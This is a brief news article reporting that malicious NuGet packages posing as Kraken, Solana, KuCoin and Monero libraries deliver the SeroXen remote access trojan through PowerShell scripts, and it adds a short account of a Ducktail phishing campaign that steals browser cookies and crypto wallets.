Crypto-Themed Malware Infiltrates NuGet Server

As hackers launch new scams, malicious packages impersonating Kraken, Solana, and Monero have inundated the NuGet server.

NuGet, a manager used for packaging and distributing .NET-based software, appears to be a target for malicious actors impersonating crypto-related packages to exploit vulnerabilities.

Six malicious packages downloaded by a user going by the name “Disti” pose as Kraken, Solana, KuCoin, and Monero libraries and wrappers, according to the first report from Phylum researchers.

According to reports, the bad actor also attempted to bolster his credibility by forging download statistics.

After installing malware on a victim’s computer, it executes.cmd and .bat files using two PowerShell scripts. Eventually, the scripts attempt to remain unnoticed by not producing visible output or errors and by downloading an external file.

Following a lengthy sequence of manipulations, the script downloads the SeroXen RAT. This stealthy remote access trojan gained popularity alongside video game cheats for Call of Duty: Warzone and Fortnite.

The trojan is well-known among cybercriminals because it grants complete access to a victim’s computer with minimal detection. According to BleepingComputer, the malware remains on NuGet’s server.

According to previous reports, a new variant of the Ducktail phishing campaign spreads PHP malware that can access and steal Facebook accounts, browsing data, and even cryptocurrency wallets.

According to reports, the attackers use social engineering techniques and seek victims on LinkedIn, a professional networking website.

The malicious software is spread as an archive containing images, videos, and documents. After the file is downloaded and opened, browser cookies are read and sent to the hacker’s server.